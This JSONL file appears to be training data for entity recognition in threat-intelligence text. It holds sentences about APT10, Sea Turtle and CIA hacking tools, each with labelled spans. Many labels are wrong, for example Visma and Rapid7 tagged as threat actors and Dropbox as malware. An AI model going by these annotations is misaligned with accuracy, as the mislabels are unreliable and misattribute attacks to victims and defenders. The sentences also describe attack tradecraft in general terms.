{"text": "These actors use Let's Encrypts , Comodo , Sectigo , and self-signed certificates in their MitM servers to gain the initial round of credentials .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "TOOL: Encrypts": [[23, 31]], "TOOL: Comodo": [[34, 40]], "TOOL: Sectigo": [[43, 50]], "TOOL: self-signed certificates": [[57, 81]], "TOOL: MitM servers": [[91, 103]]}, "info": {"id": "dnrti_train_002713", "source": "dnrti_train"}}
{"text": "These actors have been more aggressive in their pursuit targeting DNS registries and a number of registrars , including those that manage ccTLDs .", "spans": {"THREAT_ACTOR: actors": [[6, 12]], "ORGANIZATION: manage": [[131, 137]], "ORGANIZATION: ccTLDs": [[138, 144]]}, "info": {"id": "dnrti_train_002714", "source": "dnrti_train"}}
{"text": "Once they have access to the network , they steal the organization's legitimate SSL certificate and use it on actor-controlled servers .", "spans": {"THREAT_ACTOR: they": [[39, 43]], "TOOL: actor-controlled": [[110, 126]], "TOOL: servers": [[127, 134]]}, "info": {"id": "dnrti_train_002715", "source": "dnrti_train"}}
{"text": "We believe that the Sea Turtle campaign continues to be highly successful for several reasons .", "spans": {"ORGANIZATION: We": [[0, 2]]}, "info": {"id": "dnrti_train_002716", "source": "dnrti_train"}}
{"text": "Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains .", "spans": {"THREAT_ACTOR: attackers": [[72, 81]]}, "info": {"id": "dnrti_train_002717", "source": "dnrti_train"}}
{"text": "The threat actors were able to maintain long term persistent access to many of these networks by utilizing compromised credentials .", "spans": {"THREAT_ACTOR: threat actors": [[4, 17]]}, "info": {"id": "dnrti_train_002719", "source": "dnrti_train"}}
{"text": "Cisco Talos will continue to monitor Sea Turtle and work with our partners to understand the threat as it continues to evolve to ensure that our customers remain protected and the public is informed .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002720", "source": "dnrti_train"}}
{"text": "Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": {"MALWARE: link file": [[9, 18]], "MALWARE: AutoHotkeyU32.exe": [[45, 62]]}, "info": {"id": "dnrti_train_002722", "source": "dnrti_train"}}
{"text": "Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": {"MALWARE: attacks": [[5, 12]]}, "info": {"id": "dnrti_train_002724", "source": "dnrti_train"}}
{"text": "By the end of 2016 , the CIA's hacking division , which formally falls under the agency's Center for Cyber Intelligence (CCI) , had over 5000 registered users and had produced more than a thousand hacking systems , trojans , viruses , and other weaponized malware .", "spans": {"THREAT_ACTOR: CIA's hacking division": [[25, 47]], "TOOL: hacking systems": [[197, 212]], "TOOL: trojans": [[215, 222]], "TOOL: viruses": [[225, 232]], "TOOL: weaponized malware": [[245, 263]]}, "info": {"id": "dnrti_train_002726", "source": "dnrti_train"}}
{"text": "Such is the scale of the CIA's undertaking that by 2016 , its hackers had utilized more code than that used to run Facebook .", "spans": {"THREAT_ACTOR: hackers": [[62, 69]]}, "info": {"id": "dnrti_train_002727", "source": "dnrti_train"}}
{"text": "Wikileaks has carefully reviewed the Year Zero disclosure and published substantive CIA documentation while avoiding the distribution of 'armed' cyberweapons until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should analyzed , disarmed and published .", "spans": {"ORGANIZATION: Wikileaks": [[0, 9]], "THREAT_ACTOR: CIA": [[84, 87]]}, "info": {"id": "dnrti_train_002728", "source": "dnrti_train"}}
{"text": "These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States .", "spans": {"THREAT_ACTOR: CIA": [[45, 48]]}, "info": {"id": "dnrti_train_002729", "source": "dnrti_train"}}
{"text": "The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell's 1984 , but Weeping Angel , developed by the CIA's Embedded Devices Branch (EDB) , which infests smart TVs , transforming them into covert microphones , is surely its most emblematic realization .", "spans": {"TOOL: Weeping Angel": [[111, 124]], "THREAT_ACTOR: CIA's": [[144, 149]], "TOOL: smart TVs": [[196, 205]]}, "info": {"id": "dnrti_train_002730", "source": "dnrti_train"}}
{"text": "As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks .", "spans": {"THREAT_ACTOR: CIA": [[23, 26]]}, "info": {"id": "dnrti_train_002732", "source": "dnrti_train"}}
{"text": "Despite iPhone's minority share (14.5%) of the global smart phone market in 2016 , a specialized unit in the CIA's Mobile Development Branch produces malware to infest , control and exfiltrate data from iPhones and other Apple products running iOS , such as iPads .", "spans": {"THREAT_ACTOR: CIA's": [[109, 114]], "TOOL: iPhones": [[203, 210]], "TOOL: Apple": [[221, 226]], "TOOL: iOS": [[244, 247]], "TOOL: iPads": [[258, 263]]}, "info": {"id": "dnrti_train_002734", "source": "dnrti_train"}}
{"text": "The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS .", "spans": {"ORGANIZATION: Samsung smart TVs": [[19, 36]], "THREAT_ACTOR: MI5/BTSS": [[92, 100]]}, "info": {"id": "dnrti_train_002735", "source": "dnrti_train"}}
{"text": "CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop .", "spans": {"THREAT_ACTOR: CIA's": [[0, 5]], "TOOL: GCHQ": [[93, 97]], "TOOL: NSA": [[100, 103]], "TOOL: cyber arms contractors": [[128, 150]]}, "info": {"id": "dnrti_train_002736", "source": "dnrti_train"}}
{"text": "CIA's malware includes multiple local and remote weaponized zero days , air gap jumping viruses such as Hammer Drill which infects software distributed on CD/DVDs , infectors for removable media such as USBs , systems to hide data in images or in covert disk areas Brutal Kangaroo and to keep its malware infestations going .", "spans": {"THREAT_ACTOR: CIA's": [[0, 5]], "TOOL: Hammer Drill": [[104, 116]], "TOOL: Brutal Kangaroo": [[265, 280]]}, "info": {"id": "dnrti_train_002739", "source": "dnrti_train"}}
{"text": "Many of these infection efforts are pulled together by the CIA's Automated Implant Branch (AIB) , which has developed several attack systems for automated infestation and control of CIA malware , such as Assassin and Medusa .", "spans": {"THREAT_ACTOR: CIA's": [[59, 64]], "TOOL: Assassin": [[204, 212]], "TOOL: Medusa": [[217, 223]]}, "info": {"id": "dnrti_train_002740", "source": "dnrti_train"}}
{"text": "The CIA has developed automated multi-platform malware attack and control systems covering Windows , Mac OS X , Solaris , Linux and more , such as EDB's HIVE and the related Cutthroat and Swindle tools , which are described in the examples section below .", "spans": {"THREAT_ACTOR: CIA": [[4, 7]], "TOOL: Windows": [[91, 98]], "TOOL: Mac OS X": [[101, 109]], "TOOL: Solaris": [[112, 119]], "TOOL: Linux": [[122, 127]], "TOOL: HIVE": [[153, 157]], "TOOL: Cutthroat": [[174, 183]], "TOOL: Swindle": [[188, 195]]}, "info": {"id": "dnrti_train_002741", "source": "dnrti_train"}}
{"text": "By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable .", "spans": {"ORGANIZATION: Apple": [[55, 60]], "ORGANIZATION: Google": [[65, 71]], "THREAT_ACTOR: CIA": [[76, 79]]}, "info": {"id": "dnrti_train_002742", "source": "dnrti_train"}}
{"text": "Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area — including France , Italy and Switzerland .", "spans": {"THREAT_ACTOR: CIA": [[18, 21]]}, "info": {"id": "dnrti_train_002743", "source": "dnrti_train"}}
{"text": "A number of the CIA's electronic attack methods are designed for physical proximity .", "spans": {"THREAT_ACTOR: CIA's": [[16, 21]]}, "info": {"id": "dnrti_train_002744", "source": "dnrti_train"}}
{"text": "The attacker is provided with a USB containing malware developed for the CIA for this purpose , which is inserted into the targeted computer .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]], "TOOL: USB containing malware": [[32, 54]]}, "info": {"id": "dnrti_train_002745", "source": "dnrti_train"}}
{"text": "The attacker then infects and exfiltrates data to removable media .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_002746", "source": "dnrti_train"}}
{"text": "For example , the CIA attack system Fine Dining , provides 24 decoy applications for CIA spies to use .", "spans": {}, "info": {"id": "dnrti_train_002748", "source": "dnrti_train"}}
{"text": "For example , Comodo was defeated by CIA malware placing itself in the Window's Recycle Bin .", "spans": {"ORGANIZATION: Comodo": [[14, 20]], "THREAT_ACTOR: CIA": [[37, 40]]}, "info": {"id": "dnrti_train_002749", "source": "dnrti_train"}}
{"text": "CIA hackers discussed what the NSA's Equation Group hackers did wrong and how the CIA's malware makers could avoid similar exposure .", "spans": {"ORGANIZATION: CIA": [[0, 3]], "THREAT_ACTOR: Equation Group": [[37, 51]]}, "info": {"id": "dnrti_train_002750", "source": "dnrti_train"}}
{"text": "The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation .", "spans": {"THREAT_ACTOR: CIA's": [[4, 9]], "THREAT_ACTOR: UMBRAGE": [[34, 41]]}, "info": {"id": "dnrti_train_002751", "source": "dnrti_train"}}
{"text": "This information is used by the CIA's 'JQJIMPROVISE' software (see below) to configure a set of CIA malware suited to the specific needs of an operation .", "spans": {"THREAT_ACTOR: CIA's": [[32, 37]], "TOOL: 'JQJIMPROVISE'": [[38, 52]]}, "info": {"id": "dnrti_train_002752", "source": "dnrti_train"}}
{"text": "HIVE is a multi-platform CIA malware suite and its associated control software .", "spans": {"TOOL: HIVE": [[0, 4]], "THREAT_ACTOR: CIA": [[25, 28]]}, "info": {"id": "dnrti_train_002754", "source": "dnrti_train"}}
{"text": "A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple , Microsoft , Google , Samsung , Nokia , Blackberry , Siemens and anti-virus companies attribute and defend against attacks .", "spans": {"THREAT_ACTOR: CIA": [[30, 33]], "ORGANIZATION: Apple": [[136, 141]], "ORGANIZATION: Microsoft": [[144, 153]], "ORGANIZATION: Google": [[156, 162]], "ORGANIZATION: Samsung": [[165, 172]], "ORGANIZATION: Nokia": [[175, 180]], "ORGANIZATION: Blackberry": [[183, 193]], "ORGANIZATION: Siemens": [[196, 203]], "ORGANIZATION: anti-virus companies": [[208, 228]]}, "info": {"id": "dnrti_train_002755", "source": "dnrti_train"}}
{"text": "In April 2013 , Kaspersky Lab reported that a popular game was altered to include a backdoor in 2011 .", "spans": {"ORGANIZATION: Kaspersky": [[16, 25]]}, "info": {"id": "dnrti_train_002756", "source": "dnrti_train"}}
{"text": "Yet again , new supply-chain attacks recently caught the attention of ESET Researchers .", "spans": {"ORGANIZATION: ESET": [[70, 74]]}, "info": {"id": "dnrti_train_002757", "source": "dnrti_train"}}
{"text": "Given that these attacks were mostly targeted against Asia and the gaming industry , it shouldn’t be surprising they are the work of the group described in Kaspersky’s Winnti – More than just a game” .", "spans": {"ORGANIZATION: Kaspersky’s": [[156, 167]], "THREAT_ACTOR: Winnti": [[168, 174]]}, "info": {"id": "dnrti_train_002758", "source": "dnrti_train"}}
{"text": "The OSB functions as the interface between CIA operational staff and the relevant technical support staff .", "spans": {"TOOL: OSB": [[4, 7]], "THREAT_ACTOR: CIA": [[43, 46]]}, "info": {"id": "dnrti_train_002759", "source": "dnrti_train"}}
{"text": "A sustained cyberespionage campaign targeting at least three companies in the United States and Europe was uncovered by Recorded Future and Rapid7 between November 2017 and September 2018 .", "spans": {"ORGANIZATION: Recorded Future": [[120, 135]], "ORGANIZATION: Rapid7": [[140, 146]]}, "info": {"id": "dnrti_train_002760", "source": "dnrti_train"}}
{"text": "The Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": {"MALWARE: Honeycomb": [[4, 13]]}, "info": {"id": "dnrti_train_002761", "source": "dnrti_train"}}
{"text": "The attackers then enumerated access and conducted privilege escalation on the victim networks , utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware .", "spans": {"THREAT_ACTOR: APT10": [[167, 172]]}, "info": {"id": "dnrti_train_002762", "source": "dnrti_train"}}
{"text": "On the two other victim networks , the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor , known to have only been used by APT10 .", "spans": {"TOOL: UPPERCUT": [[82, 90]], "THREAT_ACTOR: APT10": [[141, 146]]}, "info": {"id": "dnrti_train_002763", "source": "dnrti_train"}}
{"text": "APT10 actors then compressed proprietary data from Visma using WinRAR (deployed by the attackers) and exfiltrated to a Dropbox account using the cURL for Windows command-line tool .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: WinRAR": [[63, 69]], "TOOL: cURL": [[145, 149]]}, "info": {"id": "dnrti_train_002764", "source": "dnrti_train"}}
{"text": "On top of the breadth , volume , and targets of attacks that APT10 has conducted since at least 2016 , we now know that these operations are being run by the Chinese intelligence agency , the Ministry of State Security (MSS) .", "spans": {"THREAT_ACTOR: APT10": [[61, 66]]}, "info": {"id": "dnrti_train_002767", "source": "dnrti_train"}}
{"text": "The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 .", "spans": {"THREAT_ACTOR: APT10’s": [[98, 105]]}, "info": {"id": "dnrti_train_002771", "source": "dnrti_train"}}
{"text": "That attack was attributed to perpetrators Kaspersky called the Winnti Group .", "spans": {"ORGANIZATION: Kaspersky": [[43, 52]], "THREAT_ACTOR: Winnti Group": [[64, 76]]}, "info": {"id": "dnrti_train_002772", "source": "dnrti_train"}}
{"text": "APT10 is a threat actor that has been active since at least 2009 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002773", "source": "dnrti_train"}}
{"text": "APT10 has historically targeted healthcare , defense , aerospace , government , heavy industry and mining , and MSPs and IT services , as well as other sectors , for probable intellectual property theft .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002774", "source": "dnrti_train"}}
{"text": "We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date .", "spans": {"THREAT_ACTOR: APT10": [[11, 16]]}, "info": {"id": "dnrti_train_002775", "source": "dnrti_train"}}
{"text": "In the blog , Intrusion Truth identified APT10 as having utilized several Tianjin-based companies , including Huaying Haitai Science and Technology Development Co Ltd and Laoying Baichen Instruments Equipment Co Ltd .", "spans": {"THREAT_ACTOR: APT10": [[41, 46]]}, "info": {"id": "dnrti_train_002776", "source": "dnrti_train"}}
{"text": "Based on the technical data uncovered , and in light of recent disclosures by the U.S. Department of Justice on the ongoing activities of Chinese state-sponsored threat actors .", "spans": {"THREAT_ACTOR: Chinese state-sponsored": [[138, 161]]}, "info": {"id": "dnrti_train_002777", "source": "dnrti_train"}}
{"text": "Our research from 2017 concluded that Guangdong ITSEC (and therefore the MSS) directed the activities of a company named Boyusec , which was identified as a shell company for APT3 .", "spans": {"THREAT_ACTOR: Guangdong ITSEC": [[38, 53]], "ORGANIZATION: Boyusec": [[121, 128]], "THREAT_ACTOR: APT3": [[175, 179]]}, "info": {"id": "dnrti_train_002778", "source": "dnrti_train"}}
{"text": "The December APT10 indictment noted that the group’s malicious activities breached at least 45 companies and managed service providers in 12 countries , including Brazil , Canada , Finland , France , Germany , India , Japan , Sweden , Switzerland , the United Arab Emirates , the United Kingdom , and the United States .", "spans": {"THREAT_ACTOR: APT10": [[13, 18]]}, "info": {"id": "dnrti_train_002780", "source": "dnrti_train"}}
{"text": "In all three incidents , APT10 gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]], "TOOL: Citrix": [[80, 86]], "TOOL: LogMeIn": [[91, 98]]}, "info": {"id": "dnrti_train_002781", "source": "dnrti_train"}}
{"text": "In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company .", "spans": {"THREAT_ACTOR: APT10": [[25, 30]]}, "info": {"id": "dnrti_train_002783", "source": "dnrti_train"}}
{"text": "During this operation (dubbed ‘Cloud Hopper” because of the group’s use of popular western cloud-based services) , APT10 utilized both new malware (Quasar RAT , Trochilus , RedLeaves , ChChes as well as some familiar old tools .", "spans": {"THREAT_ACTOR: APT10": [[115, 120]], "TOOL: (Quasar RAT": [[147, 158]], "TOOL: Trochilus": [[161, 170]], "TOOL: RedLeaves": [[173, 182]], "TOOL: ChChes": [[185, 191]]}, "info": {"id": "dnrti_train_002786", "source": "dnrti_train"}}
{"text": "Most recently , on December 20 , 2018 , the U.S. Department of Justice charged two hackers associated with the Chinese Ministry of State Security (MSS) with global computer intrusion campaigns targeting intellectual property .", "spans": {"ORGANIZATION: U.S. Department": [[44, 59]], "THREAT_ACTOR: hackers": [[83, 90]]}, "info": {"id": "dnrti_train_002787", "source": "dnrti_train"}}
{"text": "This indictment attributed the intrusions to APT10 , a group that had been conducting the malicious activities for over a decade on behalf of the MSS , China’s civilian human intelligence agency .", "spans": {"THREAT_ACTOR: APT10": [[45, 50]]}, "info": {"id": "dnrti_train_002788", "source": "dnrti_train"}}
{"text": "The Visma group operates across the entire Nordic region along with Benelux , Central , and Eastern Europe .", "spans": {"THREAT_ACTOR: Visma": [[4, 9]]}, "info": {"id": "dnrti_train_002789", "source": "dnrti_train"}}
{"text": "Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 .", "spans": {"ORGANIZATION: Recorded Future": [[0, 15]], "THREAT_ACTOR: APT10": [[37, 42]]}, "info": {"id": "dnrti_train_002790", "source": "dnrti_train"}}
{"text": "We were particularly interested in identifying whether any customers of the targeted MSPs were subsequently compromised by APT10 , given their potential access through compromised MSP networks .", "spans": {"THREAT_ACTOR: APT10": [[123, 128]], "ORGANIZATION: MSP": [[180, 183]]}, "info": {"id": "dnrti_train_002791", "source": "dnrti_train"}}
{"text": "Recorded Future’s Insikt Group has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 .", "spans": {"ORGANIZATION: Recorded Future’s": [[0, 17]]}, "info": {"id": "dnrti_train_002792", "source": "dnrti_train"}}
{"text": "In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 .", "spans": {"THREAT_ACTOR: Rapid7": [[198, 204]]}, "info": {"id": "dnrti_train_002793", "source": "dnrti_train"}}
{"text": "On August 30 , 2018 , APT10 deployed their first modified version of Trochilus that had its C2 communications encrypted using Salsa20 and RC4 ciphers instead of the more common RC4-encrypted Trochilus variant seen in the wild .", "spans": {"THREAT_ACTOR: APT10": [[22, 27]], "TOOL: Trochilus": [[69, 78]]}, "info": {"id": "dnrti_train_002795", "source": "dnrti_train"}}
{"text": "APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: WinRAR": [[16, 22]], "TOOL: cURL": [[27, 31]]}, "info": {"id": "dnrti_train_002798", "source": "dnrti_train"}}
{"text": "In order to exfiltrate the compromised data , APT10 employed custom malware that used Dropbox as its C2 .", "spans": {"THREAT_ACTOR: APT10": [[46, 51]], "TOOL: Dropbox": [[86, 93]]}, "info": {"id": "dnrti_train_002799", "source": "dnrti_train"}}
{"text": "Our research partner Rapid7 investigated the Dropbox use and found that the attackers had used the same account to store exfiltrated data from a global apparel company .", "spans": {"ORGANIZATION: Rapid7": [[21, 27]], "TOOL: Dropbox": [[45, 52]], "THREAT_ACTOR: attackers": [[76, 85]]}, "info": {"id": "dnrti_train_002801", "source": "dnrti_train"}}
{"text": "They also identified broadly similar TTPs being used in the attack against a U.S law firm specializing in intellectual property law .", "spans": {"ORGANIZATION: They": [[0, 4]]}, "info": {"id": "dnrti_train_002802", "source": "dnrti_train"}}
{"text": "Rapid7’s investigation revealed the law firm was first targeted in late 2017 , followed by the apparel company a few months later , and finally , the Visma attack in August 2018 .", "spans": {"ORGANIZATION: Rapid7’s": [[0, 8]], "ORGANIZATION: law firm": [[36, 44]]}, "info": {"id": "dnrti_train_002803", "source": "dnrti_train"}}
{"text": "In one of the attacks , Rapid7 identified the attackers escaping a Citrix application in order to run the payload script on the victim desktop .", "spans": {"ORGANIZATION: Rapid7": [[24, 30]], "THREAT_ACTOR: attackers": [[46, 55]], "TOOL: Citrix": [[67, 73]]}, "info": {"id": "dnrti_train_002804", "source": "dnrti_train"}}
{"text": "Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe .", "spans": {"TOOL: Visma": [[66, 71]], "THREAT_ACTOR: APT10": [[128, 133]], "TOOL: 1.bat": [[169, 174]], "TOOL: cu.exe": [[177, 183]], "TOOL: ss.rar": [[186, 192]], "TOOL: r.exe": [[195, 200]], "TOOL: pd.exe": [[203, 209]]}, "info": {"id": "dnrti_train_002805", "source": "dnrti_train"}}
{"text": "Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": {"ORGANIZATION: Rapid7": [[21, 27]], "MALWARE: gup.exe": [[70, 77]], "MALWARE: ANEL": [[215, 219]]}, "info": {"id": "dnrti_train_002806", "source": "dnrti_train"}}
{"text": "APT10 used this approach to deploy UPPERCUT when targeting Japanese corporations in July 2018 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: UPPERCUT": [[35, 43]]}, "info": {"id": "dnrti_train_002807", "source": "dnrti_train"}}
{"text": "APT10 actors gained initial access to the Visma network around August 17 , 2018 .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]], "TOOL: Visma network": [[42, 55]]}, "info": {"id": "dnrti_train_002808", "source": "dnrti_train"}}
{"text": "While we are confident that APT10 actors gained access to the Visma network in August using stolen employee Citrix remote desktop credentials , it is not clear how or when these credentials were initially compromised .", "spans": {"THREAT_ACTOR: APT10": [[28, 33]], "ORGANIZATION: Visma": [[62, 67]], "TOOL: Citrix remote desktop": [[108, 129]]}, "info": {"id": "dnrti_train_002809", "source": "dnrti_train"}}
{"text": "After almost two weeks , on August 30 , 2018 , APT10 attackers used their access to the network to move laterally and made their first deployment of an RC4- and Salsa20-encrypted variant of the Trochilus malware using a previously associated DLL sideloading techniquE .", "spans": {"THREAT_ACTOR: APT10": [[47, 52]], "TOOL: Trochilus": [[194, 203]]}, "info": {"id": "dnrti_train_002811", "source": "dnrti_train"}}
{"text": "This means that APT10 actors had two separate access points into the Visma network .", "spans": {"THREAT_ACTOR: APT10": [[16, 21]], "TOOL: Visma network": [[69, 82]]}, "info": {"id": "dnrti_train_002812", "source": "dnrti_train"}}
{"text": "This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack .", "spans": {"THREAT_ACTOR: APT10": [[115, 120]]}, "info": {"id": "dnrti_train_002813", "source": "dnrti_train"}}
{"text": "Other examples of malicious infrastructure registered with internet.bs include domains for APT28’s VPNFilter malware campaign and the registration of the cyber-berkut .", "spans": {"THREAT_ACTOR: APT28’s": [[91, 98]], "TOOL: VPNFilter": [[99, 108]], "TOOL: cyber-berkut": [[154, 166]]}, "info": {"id": "dnrti_train_002814", "source": "dnrti_train"}}
{"text": "org domain that was affiliated with the pro-Russian and potentially Russian state-linked threat actor CyberBerkut .", "spans": {"THREAT_ACTOR: CyberBerkut": [[102, 113]]}, "info": {"id": "dnrti_train_002815", "source": "dnrti_train"}}
{"text": "KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": {"MALWARE: KHRAT": [[0, 5]], "TOOL: backdoor trojan": [[11, 26]], "THREAT_ACTOR: DragonOK": [[91, 99]]}, "info": {"id": "dnrti_train_002816", "source": "dnrti_train"}}
{"text": "In early 2018 , Rapid7 identified that APT10 compromised an apparel company , based upon detections and intelligence gathered from the U.S.-based law firm breach .", "spans": {"ORGANIZATION: Rapid7": [[16, 22]], "THREAT_ACTOR: APT10": [[39, 44]]}, "info": {"id": "dnrti_train_002817", "source": "dnrti_train"}}
{"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe.” The attackers used identical TTPs for executing malware and Mimikatz as observed before , by using DLL sideloading with known good binaries that had DLL search order path issues .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[22, 27]], "TOOL: Mimikatz": [[127, 135]]}, "info": {"id": "dnrti_train_002819", "source": "dnrti_train"}}
{"text": "Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "MALWARE: Dropbox": [[92, 99]]}, "info": {"id": "dnrti_train_002820", "source": "dnrti_train"}}
{"text": "APT10 used the same method of lateral movement by mounting the remote drive on a system , copying 1.bat to it , using task scheduler to execute the batch script , and finally , deleting the batch script .", "spans": {"THREAT_ACTOR: APT10": [[0, 5]]}, "info": {"id": "dnrti_train_002822", "source": "dnrti_train"}}
{"text": "For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe” to r.exe” to create archives , upload them with curl.exe” (renamed to c.exe”) , and again , use the cloud storage provider Dropbox .", "spans": {"THREAT_ACTOR: APT10": [[34, 39]], "TOOL: WinRAR": [[45, 51]], "TOOL: rar.exe”": [[64, 72]], "TOOL: r.exe”": [[76, 82]], "TOOL: Dropbox": [[196, 203]]}, "info": {"id": "dnrti_train_002823", "source": "dnrti_train"}}
{"text": "Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: attacker": [[97, 105]]}, "info": {"id": "dnrti_train_002824", "source": "dnrti_train"}}
{"text": "Once on the Visma network , APT10 attackers used the Microsoft BITSAdmin CLI tool to copy malicious tools from a suspected attacker-controlled C2 hosted on 173.254.236[.]158 to the \\ProgramData\\temp\\ directory on the infected host .", "spans": {"TOOL: Visma network": [[12, 25]], "THREAT_ACTOR: APT10": [[28, 33]], "TOOL: BITSAdmin": [[63, 72]]}, "info": {"id": "dnrti_train_002825", "source": "dnrti_train"}}
{"text": "Rapid7 then provided a breach notification to Visma to alert them to this compromise in September 2018 .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]]}, "info": {"id": "dnrti_train_002826", "source": "dnrti_train"}}
{"text": "We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations .", "spans": {"THREAT_ACTOR: APT10": [[11, 16]]}, "info": {"id": "dnrti_train_002827", "source": "dnrti_train"}}
{"text": "This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security .", "spans": {"THREAT_ACTOR: APT10": [[161, 166]]}, "info": {"id": "dnrti_train_002829", "source": "dnrti_train"}}
{"text": "This report , alongside the plethora of other reporting on APT10 operations , acutely highlights the vulnerability of organizational supply chains .", "spans": {"THREAT_ACTOR: APT10": [[59, 64]]}, "info": {"id": "dnrti_train_002830", "source": "dnrti_train"}}
{"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": {"THREAT_ACTOR: groups": [[15, 21]], "VULNERABILITY: CVE-2018-0798": [[35, 48]]}, "info": {"id": "dnrti_train_002831", "source": "dnrti_train"}}
{"text": "The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": {"MALWARE: ITW": [[32, 35]], "MALWARE: RTF": [[195, 198]]}, "info": {"id": "dnrti_train_002835", "source": "dnrti_train"}}
{"text": "CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption .", "spans": {"VULNERABILITY: CVE-2018-0798": [[0, 13]], "THREAT_ACTOR: threat actor": [[91, 103]]}, "info": {"id": "dnrti_train_002836", "source": "dnrti_train"}}
{"text": "As observed previously with CVE-2017-11882 and CVE-2018-0802 , the weaponizer was used exclusively by Chinese cyber espionage actors for approximately one year December 2017 through December 2018 , after which cybercrime actors began to incorporate it in their malicious activity .", "spans": {"VULNERABILITY: CVE-2017-11882": [[28, 42]], "VULNERABILITY: CVE-2018-0802": [[47, 60]], "TOOL: weaponizer": [[67, 77]], "THREAT_ACTOR: actors": [[126, 132]]}, "info": {"id": "dnrti_train_002837", "source": "dnrti_train"}}
{"text": "Upon decrypting and executing , it drops two additional files wsc_proxy.exe” (legitimate Avast executable) and a malicious DLL wsc.dll” in the %TEMP% folder .", "spans": {"MALWARE: wsc_proxy.exe”": [[62, 76]], "MALWARE: wsc.dll”": [[127, 135]]}, "info": {"id": "dnrti_train_002838", "source": "dnrti_train"}}
{"text": "However , Beginning on 25 June 2019 , we started observing multiple commodity campaigns Mostly dropping AsyncRAT using the updated RTF weaponizer with the same exploit (CVE-2018-0798) .", "spans": {"ORGANIZATION: we": [[38, 40]], "MALWARE: AsyncRAT": [[104, 112]]}, "info": {"id": "dnrti_train_002839", "source": "dnrti_train"}}
{"text": "Analysis of the Royal Road weaponizer has resulted in the discovery that multiple Chinese threat groups started utilizing CVE-2018-0798 in their RTF weaponizer .", "spans": {"THREAT_ACTOR: threat groups": [[90, 103]], "VULNERABILITY: CVE-2018-0798": [[122, 135]], "TOOL: RTF weaponizer": [[145, 159]]}, "info": {"id": "dnrti_train_002840", "source": "dnrti_train"}}
